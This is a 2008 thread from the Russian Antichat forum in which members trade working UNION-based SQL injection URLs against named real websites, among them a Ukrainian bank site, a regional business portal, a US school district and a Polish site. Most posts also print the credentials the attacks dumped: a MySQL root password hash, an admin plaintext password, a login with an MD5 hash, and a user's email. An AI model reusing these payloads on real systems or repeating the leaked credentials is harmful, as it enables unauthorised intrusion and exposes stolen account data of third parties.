HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5171  
Старый 23.03.2008, 16:32
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

мде,искал се сумку в инет шопах,а нашел sql inc=)
хотя это и не инет шоп,но все же
http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*

5.1.16-beta
catalog1
catalog1@localhost
 
Ответить с цитированием

  #5172  
Старый 23.03.2008, 16:37
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от bag  
мде,искал се сумку в инет шопах,а нашел sql inc=)
хотя это и не инет шоп,но все же
http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*

5.1.16-beta
catalog1
catalog1@localhost

Немножко дополню
http://www.classifields.ru/?field=9999+UNION+SELECT+1,concat_ws(0x2F,user,pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mys ql.user/*

получаем

root/*7030b624ca16e7dc266e074669aab3a65fad955a
 
Ответить с цитированием

  #5173  
Старый 23.03.2008, 16:44
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5, 6,7+from+mysql.user/*" ?
 
Ответить с цитированием

  #5174  
Старый 23.03.2008, 16:46
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

Цитата:
Сообщение от mff  
Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5, 6,7+from+mysql.user/*" ?
хорош тут уже фигней страдать,сходи почитай статтьи на этом сайте все есть,

а вообще вот
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2F,user,password),5,6,7+from+mysql.user/*
 
Ответить с цитированием

  #5175  
Старый 23.03.2008, 16:47
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Цитата:
Сообщение от mff  
Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5, 6,7+from+mysql.user/*" ?
Блин тут не надо писать вопросы, вот ТУТ задавай вопросы!
 
Ответить с цитированием

  #5176  
Старый 23.03.2008, 18:40
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Цитата:
http://profibank.dp.ua/view_choicelnew.php?NumNews=-27+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user())/*
5.0.22-logrofibank2_jobagency:bobunenko@localhost
приглянувшиеся таблицы
Цитата:
authorize
countchildren
directortable
dolzhnost
drivepass
education
formanayma
graphicjob
marrige
users
vladcomp
vladlan
Цитата:
пароли
Цитата:
http://profibank.dp.ua/view_choicelnew.php?NumNews=-27+union+select+1,2,3,4,password+from+users+limit+ 1,1/*
дима:дима:admin@profibank.dp.ua
---------------------------------------------------------------------
---------------------------------------------------------------------
БIЗНЕС-ПОРТАЛ
CЛАВУТЧИНИ

Цитата:
http://krai.biz/news.php?show=-89/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7/*
5.0.22-log:kraibiz@localhost:Comissar42_krai

Цитата:
пароли
Цитата:
http://krai.biz/news.php?show=-89/**/union/**/select/**/1,2,3,concat_ws(0x3a,login,password,email),5,6,7/**/from/**/users/**/limit/**/1,1/*
----------------------------------------------------------------------
---------------------------------------------------------------------
skyinform
мы знаем все об авиаперевозах

Цитата:
http://skyinform.com.ua/?page=st&id=7+union+select+1,2,concat_ws(0x3a,vers ion(),database(),user()),4,5/*
Цитата:
5.0.22-log:gust2_sky:gust@localhost
есть доступ к information_schema.tables

Последний раз редактировалось samarin; 24.03.2008 в 01:18..
 
Ответить с цитированием

  #5177  
Старый 23.03.2008, 19:16
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию

Код:
http://www.comexus.org.mx/Summer/participants.php?id=-1+union+select+version()/*
VERSION: 5.0.27-standard
USER: cmeadmin_comexus@comexus.org.mx
DATABASE: cmeadmin_comexusonline
PR: 6
 
Ответить с цитированием

  #5178  
Старый 23.03.2008, 19:27
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.scrcsd.org/main.php?page=-1+union+select+1,concat_ws(char(58),username,passw ord)+from+users/*
admin:abcat5&dog5
 
Ответить с цитированием

  #5179  
Старый 24.03.2008, 01:06
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию

Код:
http://www.fwbusinesspress.com/frames.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
VERSION: 4.0.27-log
DATABASE: xbizpress
USER: xbizpress@escher.futurequest.net
PR: 4

***************************************

Всем срочно хостится:

Код:
http://dimi.pl/regulamin.php?id=-1+union+select+1,concat_ws(version(),database(),user())/*
VERSION: 4.1.11-Debian_4sarge8-log
DATABASE: usr_sat0_4
USER: sat0@localhost
PR: 3

Код:
http://dimi.pl/regulamin.php?id=-1+union+select+1,concat(login,char(58),pass)+from+admin/*
host247:3727ee3a03fac1457d6aa96e372ada0c

Последний раз редактировалось t0ox; 24.03.2008 в 02:08..
 
Ответить с цитированием

  #5180  
Старый 24.03.2008, 06:06
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

http://www.gamingreport.com/print.php?sid=249729999+UNION+SELECT+1,2,3,4,5,con cat_ws(0x3a,version(),user())/*
сайт кишит sql inc
--------
http://www.nfb.ca/sections/thematique.php?id=102+and+substring(version(),1,1) =5/*
http://www.worldnetdaily.com/index.php?fa=PAGE.view&pageId=5845899999+UNION+SEL ECT+1,2,3,4,5,6,7,8/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ